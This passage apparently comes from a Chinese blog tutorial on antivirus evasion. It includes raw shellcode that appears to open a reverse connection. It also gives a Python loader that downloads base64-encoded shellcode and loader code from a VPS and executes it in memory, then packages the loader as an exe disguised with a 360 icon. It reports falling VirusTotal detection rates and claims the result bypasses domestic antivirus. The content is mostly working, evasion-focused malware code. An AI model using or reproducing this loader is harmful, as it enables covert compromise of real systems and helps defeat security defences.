ex3exc5x7dx7cxbaxb0x83x34x31xcdxccx11xf8x78x64x4dxe5x93x0dx7dxcexacx63x6fx06x42x0dx18xa2x5ex01xb3x87xcdx1dx8exd4x0bx19xe8xd7xcax9fx83xaaxa8x4bx75x45x62x93x55xf2x2cxb7xe9x2fxd8x78x38x64x21xbdx5exebx11xd3x38xaax1fx5cx34xd4x04x8cxecx18x44x5fx46x40x65x5bx67xecxd1x39x66x9dx89x9cx47xdex9exe9x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex38x2ex34x38x00x19x69xa0x8d"

直接写shellcode，改为：

base_64_shellcode = requests.get("http://vps_address/code/1.txt", timeout=10).text
# 从vps获取加密后的shellcode
shellcode = eval(base64.b64decode(base_64_shellcode).decode('utf-8'))
# 解密并转为十六进制

实现shellcode分离。

2.3 shellcode 分离后shellcode loader脚本上线测试

测试分离shellcode后的脚本是否能上线：

成功上线：

2.4 shellcode 分离后，使用pyinstaller生成exe文件上线测试

打包为exe测试是否能成功上线：

pyinstaller -w -F Loader4.py -i 360.ico -n test2.exe

成功上线：

2.5 VT查杀率：14/67

已经比shellcode分离前好很多了，能不能再好点？
思路：既然shellcode能分离，为什么不把shellcode loader也分离了。

3. ShellCode 及ShellCoder 的分离 3.1 改写shellcode loader

将

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

改写为一条语句：

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64;ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40));buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)));handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)));ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

base64加密：

Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLGN0eXBlcy5jX2ludCgweDQwKSk7YnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKTtjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoY3R5cGVzLmNfdWludDY0KHB0ciksIGJ1ZiwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSk7aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQ==

上传vps，并访问测试：

再次改写源代码后，关键代码仅为6行：

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time    : 2021/10/24 18:05
# @Author  : AA8j
# @Site    : 
# @File    : Loader4.py
# @Software: PyCharm
# @Blog    : https://blog.csdn.net/qq_44874645
import base64
import ctypes
import requests

base_64_shellcode = requests.get("http://vps_address/code/1.txt", timeout=10).text
# 获取base64加密的shellcode
shellcode = eval(base64.b64decode(base_64_shellcode).decode('utf-8'))
# 将shellcode解密并转换为十六进制
shellcode = bytearray(shellcode)
base_64_shellcode_loader = requests.get("http://vps_address/code/2.txt", timeout=10).text
# 获取加密的shellcode loader
shellcode_loader = base64.b64decode(base_64_shellcode_loader).decode('utf-8')
# 解密shellcode loader
exec(shellcode_loader)
# 执行shellcode loader

再过分点。。。追求极致的话，最终关键代码只有两行：

import base64
import ctypes
import requests

shellcode = bytearray(eval(base64.b64decode(requests.get("http://vps_address/code/1.txt", timeout=10).text).decode('utf-8')))
exec(base64.b64decode(requests.get("http://vps_address/code/2.txt", timeout=10).text).decode('utf-8'))

3.2 shellcode和shellcode loader均分离后，两行代码的脚本上线测试

成功上线：

3.3 使用pyinstaller生成exe文件上线测试

成功上线：

3.4 VT查杀率：10/68

bypass国内AV足以。

参考文章：
https://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247486638&idx=1&sn=99ce07c365acec41b6c8da07692ffca9&chksm=ea37f3f4dd407ae28611d23b31c39ff1c8bc79762bfe2535f12d1b9d7a6991777b178a89b308&mpshare=1&scene=23&srcid=1023DVtA1pojG9u9T1BYyZXO&sharer_sharetime=1635002636740&sharer_shareid=4590fc5f03636a9b79d352885e22ea93#rd
https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247484538&idx=1&sn=a23fec3cad596102d30a99bad6c27b85&chksm=9774389ba003b18d5428ed6f75490b8cda7f9dcae2e9726ad42ac2d939794c103a7f561f905e&scene=21#wechat_redirect